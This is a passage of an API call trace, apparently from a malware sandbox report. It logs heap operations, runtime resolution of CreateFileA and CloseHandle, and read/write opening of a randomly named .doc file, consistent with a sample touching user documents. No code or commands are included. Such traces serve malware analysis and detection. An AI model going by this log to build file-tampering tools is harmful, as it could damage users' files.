WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88ce08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0034.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0034.080] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0034.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0034.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0034.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0034.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0034.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0034.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0034.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0034.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0034.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0034.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0034.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0034.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0034.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x935008 [0034.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc", cchWideChar=105, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 105 [0034.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x69) returned 0x7db378 [0034.081] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc", cchWideChar=105, lpMultiByteStr=0x7db378, cbMultiByte=105, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc", lpUsedDefaultChar=0x0) returned 105 [0034.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0034.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0034.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0034.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0034.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0034.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0034.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0034.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0034.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0034.081] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\g_elj7pqzi27.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0034.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0034.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0034.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0034.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0034.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0034.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0034.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0034.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0034.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0034.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0034.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0034.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0034.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0034.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0034.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=105, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0034.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd2) returned 0x7c5448 [0034.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=105, lpWideCharStr=0x7c5448, cchWideChar=105 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc") returned 105 [0034.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0034.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe0) returned 0x7c50e0 [0034.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0034.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0034.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0034.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0034.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0034.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0034.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0034.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0034.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0034.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0034.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0034.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0034.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0034.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0034.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0034.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0034.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0034.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0034.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0034.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0034.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0034.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0034.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0034.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0034.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0034.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0034.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0034.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0034.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0034.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0034.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0034.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0034.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0034.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0034.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0034.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0034.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0034.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0034.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0034.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0034.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0034.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0034.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0034.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0034.083] FreeLibrary (hLibModule=0x76e10000) returned 1 [0034.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0034.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0034.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0034.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0034.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0034.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0034.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0034.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0034.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0034.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0034.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0034.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0034.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0034.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0034.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0034.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0034.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0034.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0034.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0034.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0034.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0034.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0034.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0034.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0034.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0034.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0034.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0034.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0034.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0034.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0034.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0034.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0034.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0034.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0034.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0034.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0034.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0034.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0034.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0034.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0034.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0034.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0034.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0034.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0034.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0034.084] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0034.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0034.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0034.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0034.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0034.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0034.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0034.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0034.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0034.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0034.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0034.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0034.085] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0034.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0034.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0034.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0034.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0034.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0034.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0034.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0034.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0034.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0034.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0034.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0034.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0034.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0034.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0034.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0034.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0034.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0034.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0034.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0034.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0034.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0034.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0034.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0034.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0034.085] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0034.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0034.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0034.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0034.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0034.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0034.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0034.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0034.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0034.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0034.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0034.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0034.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0034.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0034.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0034.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0034.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0034.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0034.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0034.086] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0034.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0034.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0034.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0034.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce50 [0034.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88ce50, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0034.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0034.086] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0034.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0034.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0034.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0034.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0034.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0034.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0034.087] CloseHandle (hObject=0x128) returned 1 [0034.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0034.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0034.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0034.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0034.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0034.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0034.087] FreeLibrary (hLibModule=0x76e10000) returned 1 [0034.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0034.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0034.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0034.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0034.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0034.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0034.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0034.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0034.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0034.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0034.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0034.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0034.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0034.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0034.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0034.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: 